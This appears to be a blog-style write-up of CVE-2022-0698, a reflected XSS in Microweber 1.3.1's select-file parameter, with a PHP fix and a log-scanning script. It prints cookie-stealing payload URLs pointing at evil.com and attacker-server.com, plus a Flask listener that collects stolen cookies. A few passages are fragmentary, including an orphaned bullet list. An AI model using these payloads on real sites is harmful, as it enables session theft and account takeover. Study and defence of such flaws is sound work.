CVE-2022-0698 - How an Unauthenticated XSS in Microweber 1.3.1 Allows Account Takeover

Microweber, an open-source drag-and-drop website builder, is known for its flexibility and ease of use. But, like all software, it’s not immune to security vulnerabilities. One such flaw, CVE-2022-0698, found in version 1.3.1, can let a hacker take over a user’s account—no password, no authentication needed. This post breaks down the vulnerability, gives a live code demonstration, and explains how an attacker could exploit it.

What is CVE-2022-0698?

CVE-2022-0698 is a Cross-Site Scripting (XSS) vulnerability found in Microweber 1.3.1. The issue lives in the select-file parameter on the platform. Basically, the web app doesn't clean up what a user submits in that field. So, a crafty attacker can inject malicious JavaScript, which runs in a logged-in user's browser, stealing their session, changing their password, or worse.

Original reference:  
- huntr.dev report  
- NVD Entry

Where’s the Bug?

The vulnerable code is in the way Microweber renders files selected by users. Instead of sanitizing user input, it echoes it directly in the page. Here’s a simplified PHP code snippet taken from a vulnerable version:

<?php
// Vulnerable handler for select-file parameter
if (isset($_GET['select-file'])) {
    $file = $_GET['select-file'];
    echo "<div>Selected file: $file</div>";
}
?>

No validation or escaping there! That means anything submitted in the select-file field will show up on the page, unfiltered.

https://victim-site.com/page?select-file=fetch('https://evil.com/steal?cookie='+document.cookie)

Full Proof of Concept (PoC)

Here’s a working demo you can try on a test or vulnerable site (never against real users or production servers):

Malicious URL

https://example.com/page?select-file=<script>new Image().src='https://attacker-server.com/steal?cookie='+document.cookie;</script>;

If a logged-in administrator loads this page, their browser runs the JavaScript, sending their session cookie to the attacker's server.

The attacker listens on their server for stolen cookies:

from flask import Flask, request

app = Flask(__name__)

@app.route('/steal')
def steal():
    cookie = request.args.get('cookie')
    print("Stolen cookie: ", cookie)
    return '', 204

if __name__ == '__main__':
    app.run(host='...', port=80)

- Install malware on the site.
- Access sensitive/private data.

No authentication needed—the attacker just needs a user with higher privileges to click their crafted link.

How to Fix

The root problem is that user input goes directly to HTML with no filtering or escaping. Here’s a quick fix:

Patch Example

if (isset($_GET['select-file'])) {
    $file = htmlspecialchars($_GET['select-file'], ENT_QUOTES, 'UTF-8');
    echo "<div>Selected file: $file</div>";
}

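Escape the value with htmlspecialchars before writing it into the page, as in the patch above, so that any markup in select-file is rendered as text instead of being interpreted by the browser. Upgrade to a fixed version if possible (Microweber has patched this issue).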
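
Log review example (added here; not code from the original post or from Microweber): after patching, it is worth checking whether the select-file parameter was already probed. The sketch below scans web server access logs for select-file values that carry HTML markup, including double percent-encoded ones. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Characters a file selection should never need and that the vulnerable
# handler would echo unescaped. A quote in a real file name can false-positive.
MARKUP = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_select_file(log_line):
    """Return the decoded select-file value if it carries markup, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qsl performs the first round of percent-decoding itself.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if fully_decode(name).lower() == "select-file":
            decoded = fully_decode(value)
            if MARKUP.search(decoded):
                return decoded
    return None

def scan(lines):
    """Yield (line_number, decoded_value) for every flagged request."""
    for number, line in enumerate(lines, start=1):
        hit = suspicious_select_file(line)
        if hit is not None:
            yield number, hit

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2023:10:00:00 +0000] "GET /page?select-file=logo.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2023:10:01:10 +0000] "GET /page?select-file=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 540 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2023:10:01:40 +0000] "GET /page?select-file=%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 530 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2023:10:02:02 +0000] "GET /page?other=%3Cb%3E HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: select-file={value!r}")
```

A hit only shows that markup was sent in the parameter; whether it executed depends on the Microweber version that served the request.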

Conclusion

CVE-2022-0698 is a classic example of why input validation is crucial. Microweber 1.3.1's simple oversight in handling the select-file parameter lets attackers inject scripts and take over accounts.  
If you use Microweber, update immediately!  
Always sanitize and escape user input; your users’ security depends on it.

References

- huntr.dev Advisory
- NVD CVE-2022-0698
- Microweber security commits

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/30/2022 16:07:00 UTC